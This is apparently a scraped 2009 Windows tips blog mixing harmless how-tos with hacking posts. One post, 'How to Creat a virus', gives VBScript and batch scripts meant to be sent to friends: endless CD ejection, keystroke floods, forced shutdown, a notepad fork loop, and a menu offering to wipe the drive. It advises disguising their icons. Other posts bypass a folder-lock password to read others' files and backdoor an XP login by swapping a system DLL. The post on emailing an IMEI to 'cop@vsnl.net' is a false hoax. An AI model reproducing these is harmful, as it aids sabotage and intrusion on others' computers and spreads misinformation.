Monday, November 9, 2009
Verifying a Blogger blog in Webmaster Tools
In Webmaster Tools
1. Click the "Add a site" button on the Webmaster Tools Home page
2. Enter your blog's URL (for example, googlewebmastercentral.blogspot.com) and click the "Continue" button to go to the Manage verification page
3. Select the "Meta tag" verification method and copy the meta tag provided
In Blogger
4. Go to your blog and sign in
5. From the Blogger dashboard click the "Layout" link for the blog you're verifying
6. Click the "Edit HTML" link under the "Layout" tab which will allow you to edit the HTML for your blog's template
7. Paste the meta tag (copied in step 3) immediately after the element within the template HTML and click the "SAVE TEMPLATE" button In Webmaster Tools
8. On the Manage Verification page, confirm that "Meta tag" is selected as the verification method and click the "Verify" button
Your blog should now be verified. You're ready to start using Webmaster Tools! :)
Sunday, November 8, 2009
Open locked folder without knowing its password!
So here the trick for those who forgot their password of folder locked xp or who wants to get into others personal folder. - Open run
- Type regedit
- Hit enter
- Open It by double clicking there In The Left Side you will see Something like : HKEY_LOCAL_MACHINE just click it.
- Then find the file name software In the list and open it.
- Then Find The Name called EverStrike…. doubleclick It…..
- You will see LF30 Just click it.
- On the right Side Some thing will appear out of those Select the file named Password & Delete It.
- Thats all, HAPPY HACKING !

Saturday, November 7, 2009
How to Hack Windows XP
2. Download DreamPackPL HERE.
3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
How to Permanently Stick Your Program in Start Menu
Let's say, you have a software that is very important but you don't use it frequently like your tax software for example. So the practical difficulty is to find it every time from All Programs because you aren't likely to get it under Start menu option. It kills time, complicates the process and consequently makes you less productive. So what you do is:- Right click on any .exe file in Explorer, My Computer, Desktop
- Select Pin to Start Menu,
- The program is then displayed on the start menu, above the separator line.
- To remove it, click the file on the start menu and select 'Unpin from Start Menu'. Below you can check the before and after shots.
How to Rename Recycle Bin on Windows XP
- Go to registry by clicking on Start menu -> run
- Type regedit
- Go to: HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
or
Press CTRL+F and then at the search box type {645FF040-5081-101B-9F08-00AA002F954E} - Right click on default and click on Modify
- Change the name of Recycle Bin to whatever you want.
How to Convert between FAT32 & NTFS in Windows XP
- advanced security using access control lists
- Provides file & directory compression for storing more data
- Encryption
- Quotas
- Robustness
- So now if you are allured to convert your files to NTFS , is there a way? Yes sir. there is.
- Open Command Prompt.
- Click Start, point to All Programs,
- Point to Accessories
- Click Command Prompt
- In the command prompt window, type: convert drive_letter: /fs:ntfs
How To Delete Multi OS Boot Screen
Suppose you have multiple copies of Windows XP installed in your PC in different drives or installed Windows XP on top of another operating system like Windows 98 or Windows 2000. Now, though you may have removed some or all of the older versions, still the boot screen continues to show the old operating system entries. Isn't it annoying and confusing to remember and select every time the only right option? Don't worry, here is how you can get rid of the problem forever:
- Load windows and login if required
- Go to Start menu, click on Run and then type cmd. This open up the command window.
- Type this command:
bootcfg /delete /id x
where x is the number of the option you want to delete. Say, for example, you want to delete 2nd boot option then you will type bootcfg /delete /id 2 and so on. - Now reboot the machine to check that you have only the correct option(s) available.
- Please be careful in step 3 and don't delete the correct operating system because that will prevent you from booting.
- Repeat step 3 to delete all unnecessary operating system menus.
How to Remove Shortcut Arrows From Desktop Icons In Windows XP
- Go to registry by clicking on Start menu -> run and type regedit
- Navigate to HKEY_CLASSES_ROOT -> lnkfile
or
Press CTRL+F and then at the search box type lnkfile and search. - Delete the IsShortcut registry value.
How to Remove Hidden Software In Windows XP
- Find and edit the text file at c:\windows\inf\sysoc.inf OR
- Go to Windows folder
- Find the Inf folder inside that
- Search for the sysoc.inf file
- Search for the word hide and remove it. Do NOT remove any other text from the line.
- Now you can go to the Add or Remove Programs in the Control Panel
- Select Add/Remove Windows Components and there you can find your unwanted software. Go ahead and Uninstall.
How to Creat a virus
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
2) Toggle your friend's Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
3) Convey your friend a lil' message and shut down his / her computer:
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.
6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
8. Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
10) THREATEN BY MAKING SCREEN FLASH
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
To disable error (ctrl+shirt+esc) then end process wscript.exe
Control your mouse with keyboard
Friday, November 6, 2009
Make Your Computer Able To TalkTalk
Here is how--------
Open a NOTEPAD/WORDPAD/ANY TEXT EDITOR in notepad and write:
Dim msg, sapi
msg=InputBox( "Enter your text","Talk it")
Set sapi=CreateObject( "sapi.spvoice" )
sapi.Speak msg
Save the file with a (*.vbs) extension,
it will create a VBScript File.
Now open the saved file, input the text and press ok."
You will hear what you typed
this works in Windows XP and in Vista also.
enjoy!!!
Mobile Stolen !!!! What to do now?
Online Trace Mobile Number Networks & Locations in India.
If
your handset is stolen then also you need not to hassle around. Just follow simple steps to trace the exact location of your cell phone.
Each mobile carries a unique IMEI i.e International Mobile Identity, number which can be used to track your mobile anywhere in the world.
1. Dial *#06# from your mobile.
2. Your mobile shows a unique 15 digit.
3. Note down this no anywhere but except your mobile as this is the number which will help trace your mobile in case of a theft.
4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
5. No need to go to police.
6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.
7. You will find where your hand set is being operated even in case your number is being changed.
How to Find Your Own IP Address
Here’s the how for Windows –
Go to Start – Run. Type in cmd to bring up the command prompt.
On the command prompt, type in ipconfig/all and hit enter.
Basic information of your network interfaces is listed along with your device’s IP address.
(Please note that your IP address may be static or dynamic depending on how the DHCP server that’s assigns the IPs is configured.)
The ISP service provider knows exactly where we are located. With the tools mentioned here, at best we can find the approximate area (even though a city is a large area!). It’s still useful…All The Best !!!!!!!!!
Tuesday, November 3, 2009
Install Windows XP using USB Flash Disk/ Flash Drive
just follow this guide :
Buy an USB Flash Drive (at least 2GB).
When you do this tutorial, please make sure your computer/laptop/PC has a CD-ROM (or DVD).
so, now you have 2 computers, with CD-ROM support and without CD-ROM support.
http://hotfile.com/dl/16620128/8c0a7a3/Komku-SP-usb.exe.html
-BootSect.exe (Boot Sector Manipulation Tool)
-PeToUSB
-usb_prep8 (Prepares Windows XP Setup LocalSource for Copy to USB-Drive)
Double click Komku-SP-usb.exe
Insert your USB Flash Drive.
double click PeToUSB.exe
check on Enable Disk Format
check on Quick Format
check on Enable LBA (FAT 16x)
Drive Label : XP-KOMKU (or whatever you want)
then click Start
click Yes


how to do this?
first type this cd\ and press Enter

on command prompt window, type bootsect /nt52 H:


the result... "Successfully updated filesystem bootcode. Bootcode was succesfully updated on all targeted volumes."

step 7:
now type this cd.. and press Enter

Your command prompt window will look like this

usb_prep8 welcome screen will appear
Prepares Windows XP LocalSource for Copy to USB-Drive:
0) Change Type of USB-Drive, currently [USB-stick]
1) Change XP Setup Source Path, currently []
2) Change Virtual TempDrive, currently [T:]
3) Change Target USB-Drive Letter, currently []
4) Make New Tempimage with XP LocalSource and Copy to USB-Drive
5) Use Existing Tempimage with XP LocalSource and Copy to USB-Drive
F) Change Log File - Simple OR Extended, currently [Simple]
Q) Quit
Enter your choice:_
now, insert your original Windows XP CD, or Windows XP with sata ahci driver to your CD/DVD ROM
and back to Command Prompt window
type 1 then press Enter...
"Browse For Folder" window will appear, select your CD/DVD drive and click OK


how to change it?
type 2 and press Enter...

for example you doesn't have drive S
so you type S and press Enter
back to usb_prep8 welcome screen...
now type 3 and press Enter...

because my Flash drive letter is H

after back to usb_prep8 welcome screen...
now type 4 and press Enter to make new temporary image with XP LocalSource and copy it to USB Flash Drive
please wait a few seconds..

type Y and press Enter
please wait....
when format virtual disk complete, press any key to continue...

Press any key to continue...

Click Yes, and wait...

Click Yes

Click Yes, wait a few seconds, and press any key....
press any key again to close usb_prep8...
Now, insert your USB Flash Drive/Flash Disk/Thumb Drive to your notebook
go to BIOS and make USB HDD (or USB ZIP in some other machine) as primary boot device....
then boot form your USB Flash Drive....
and select "TXT Mode Setup Windows XP, Never unplug USB-Drive Until After Logon"
and wait...
this time select "GUI Mode setup Windows XP, Continue Setup + Start XP"


Windows XP Installed....
good luck! Install Windows XP using USB Flash Disk/ Flash Drive
just follow this guide :
Buy an USB Flash Drive (at least 2GB).
When you do this tutorial, please make sure your computer/laptop/PC has a CD-ROM (or DVD).
so, now you have 2 computers, with CD-ROM support and without CD-ROM support.
http://hotfile.com/dl/16620128/8c0a7a3/Komku-SP-usb.exe.html
-BootSect.exe (Boot Sector Manipulation Tool)
-PeToUSB
-usb_prep8 (Prepares Windows XP Setup LocalSource for Copy to USB-Drive)
Double click Komku-SP-usb.exe
Insert your USB Flash Drive.
double click PeToUSB.exe
check on Enable Disk Format
check on Quick Format
check on Enable LBA (FAT 16x)
Drive Label : XP-KOMKU (or whatever you want)
then click Start
click Yes


how to do this?
first type this cd\ and press Enter

on command prompt window, type bootsect /nt52 H:


the result... "Successfully updated filesystem bootcode. Bootcode was succesfully updated on all targeted volumes."

step 7:
now type this cd.. and press Enter

Your command prompt window will look like this

usb_prep8 welcome screen will appear
Prepares Windows XP LocalSource for Copy to USB-Drive:
0) Change Type of USB-Drive, currently [USB-stick]
1) Change XP Setup Source Path, currently []
2) Change Virtual TempDrive, currently [T:]
3) Change Target USB-Drive Letter, currently []
4) Make New Tempimage with XP LocalSource and Copy to USB-Drive
5) Use Existing Tempimage with XP LocalSource and Copy to USB-Drive
F) Change Log File - Simple OR Extended, currently [Simple]
Q) Quit
Enter your choice:_
now, insert your original Windows XP CD, or Windows XP with sata ahci driver to your CD/DVD ROM
and back to Command Prompt window
type 1 then press Enter...
"Browse For Folder" window will appear, select your CD/DVD drive and click OK


how to change it?
type 2 and press Enter...

for example you doesn't have drive S
so you type S and press Enter
back to usb_prep8 welcome screen...
now type 3 and press Enter...

because my Flash drive letter is H

after back to usb_prep8 welcome screen...
now type 4 and press Enter to make new temporary image with XP LocalSource and copy it to USB Flash Drive
please wait a few seconds..

type Y and press Enter
please wait....
when format virtual disk complete, press any key to continue...

Press any key to continue...

Click Yes, and wait...

Click Yes

Click Yes, wait a few seconds, and press any key....
press any key again to close usb_prep8...
Now, insert your USB Flash Drive/Flash Disk/Thumb Drive to your notebook
go to BIOS and make USB HDD (or USB ZIP in some other machine) as primary boot device....
then boot form your USB Flash Drive....
and select "TXT Mode Setup Windows XP, Never unplug USB-Drive Until After Logon"
and wait...
this time select "GUI Mode setup Windows XP, Continue Setup + Start XP"


Windows XP Installed....
good luck! 



















